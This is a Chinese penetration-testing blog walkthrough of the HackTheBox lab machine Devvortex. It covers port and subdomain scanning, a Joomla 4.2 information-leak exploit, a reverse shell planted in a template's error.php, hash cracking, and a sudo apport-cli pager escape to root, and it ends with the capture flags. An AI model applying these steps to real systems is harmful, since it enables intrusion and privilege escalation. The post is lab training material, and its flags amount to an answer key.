[渗透测试学习] Devvortex - HackTheBox

2023-12-13 10:54:38


信息搜集

扫描端口

nmap -sV -sC -p- -v --min-rate 1000 10.10.11.242

在这里插入图片描述发现80端口有http服务,并且是nginx服务
尝试访问web界面,发现跳转到http://devvortex.htb/无法访问
我们用vim添加该域名即可

sudo vim /etc/hosts

在这里插入图片描述
我们访问发现是企业站点,扫描一下是否存在子域名

gobuster vhost -u http://devvortex.htb/ -w /usr/share/wordlists/dirb/big.txt --append-domain

得到子域名
在这里插入图片描述和刚刚一样添加到/etc/hosts,然后扫描目录
在这里插入图片描述

解题步骤

能扫出/adminisrator,我们登录web界面访问robots.txt
在这里插入图片描述
知道为Joomla CMS
我们用kali自带的工具去扫描出Joomla版本信息

joomscan -u http://dev.devvortex.htb/

在这里插入图片描述然后再利用工具searchsploit去找漏洞

searchsploit joomla 4.2

在这里插入图片描述
然后记住该脚本序号,使用-m参数复制下来
在这里插入图片描述
此脚本是ruby编写的,所以执行命令如下

./51334.py http://dev.devvortex.htb > joomla_exp.out

注:url不为http://dev.devvortex.htb/

在这里插入图片描述查看一下得到密码,数据库名

由于ssh连接不上,我们采取反弹shell
用刚刚的账号密码登录
在这里插入图片描述然后在System的site template(网站模板)处点击第一个
然后修改error.php,添加反弹shell命令
在这里插入图片描述开启监听,访问给的路径/templates/cassiopeia/error.php
成功反弹shell
在这里插入图片描述
但是我们发现目前用户的权限不够
在这里插入图片描述

那么我们尝试登录其他用户
先提升下shell权限

python3 -c 'import pty; pty.spawn("/bin/bash")'

再连接数据库

mysql -u lewis -p joomla

在这里插入图片描述然后得到logan的密码
在这里插入图片描述用工具john爆破一下得到密码
在这里插入图片描述然后ssh连接

ssh logan@10.10.11.242

得到user的flag
在这里插入图片描述
我们sudo看下能用的命令
在这里插入图片描述
发现有个脚本,我们谷歌尝试搜一下apport-cli exploit
直接搜到现成的poc
在这里插入图片描述

靶机有crash文件情况
刚开始ls还没找到,加个参数-al才发现有

在这里插入图片描述执行命令

sudo /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash

选择v模式
在这里插入图片描述
进入文件后输入!id,成功提权
在这里插入图片描述

查询完按回车,再次输入!cat /root/root.txt
得到root的flag
在这里插入图片描述

靶机无crash文件情况
我们目的就是开启V模式,那么我们可以利用-f和–pid参数
在这里插入图片描述
我们开启pid进程
在这里插入图片描述然后执行

sudo /usr/bin/apport-cli -f --pid=4365

同样能进入V模式
在这里插入图片描述后面步骤就一样的不再叙述

提交flag

user: dc5d3636a25c08eab2b633c3af454cc2
root: 72254d1c628607e1670942d1ba21b4de

文章来源:https://blog.csdn.net/m0_73512445/article/details/134882601
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。